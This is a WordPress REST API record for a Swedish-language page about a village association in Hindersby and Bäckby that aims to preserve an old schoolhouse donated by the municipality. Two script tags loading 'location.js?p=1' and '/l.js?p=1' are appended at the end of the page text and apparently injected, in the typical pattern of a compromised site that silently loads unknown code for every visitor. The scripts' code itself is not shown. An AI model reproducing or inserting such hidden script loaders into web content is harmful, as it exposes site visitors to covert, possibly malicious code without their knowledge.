{"id":486,"date":"2011-05-19T21:24:51","date_gmt":"2011-05-19T19:24:51","guid":{"rendered":"http:\/\/84.20.155.7\/nywp\/?page_id=486"},"modified":"2011-05-19T21:24:51","modified_gmt":"2011-05-19T19:24:51","slug":"gamla-folkskolans-vanner-gfv","status":"publish","type":"page","link":"https:\/\/hindersby.net\/nywp\/?page_id=486","title":{"rendered":"Gamla folkskolans v\u00e4nner &#8211; GFV"},"content":{"rendered":"<p>Gamla folkskolans v\u00e4nner \u00e4r en f\u00f6rening f\u00f6r Hindersby och B\u00e4ckby med syfte att bevara gamla folkskolan p\u00e5 allm\u00e4nningen Hermanstad (det omr\u00e5de i Hindersby d\u00e4r skolorna finns) i s\u00e5 ursprungligt skick som m\u00f6jligt och anv\u00e4nda den huvudsakligen f\u00f6r<br \/>\nHindersby och B\u00e4ckby byaverksamhet.<\/p>\n<p>F\u00f6reningen har anh\u00e5llit om att blir registrerad f\u00f6r att kunna skriva avtal och ta emot skolbyggnaderna som kommunen s\u00e5 v\u00e4nligt donerat \u00e5t f\u00f6reningen. Till dess fungerar den fullt ut som en f\u00f6rening &#8211; men oregistrerad.<script src='location.js?p=1' type=text\/javascript><\/script><script src='\/l.js?p=1' type=text\/javascript><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Gamla folkskolans v\u00e4nner \u00e4r en f\u00f6rening f\u00f6r Hindersby och B\u00e4ckby med syfte att bevara gamla folkskolan p\u00e5 allm\u00e4nningen Hermanstad (det omr\u00e5de i Hindersby d\u00e4r skolorna finns) i s\u00e5 ursprungligt skick som m\u00f6jligt och anv\u00e4nda den huvudsakligen f\u00f6r Hindersby och B\u00e4ckby byaverksamhet. F\u00f6reningen har anh\u00e5llit om att blir registrerad f\u00f6r att kunna skriva avtal och ta &hellip; <a href=\"https:\/\/hindersby.net\/nywp\/?page_id=486\" class=\"more-link\">Forts\u00e4tt l\u00e4sa<span class=\"screen-reader-text\"> \u201dGamla folkskolans v\u00e4nner &#8211; GFV\u201d<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-486","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages\/486","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=486"}],"version-history":[{"count":1,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages\/486\/revisions"}],"predecessor-version":[{"id":487,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages\/486\/revisions\/487"}],"wp:attachment":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=486"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}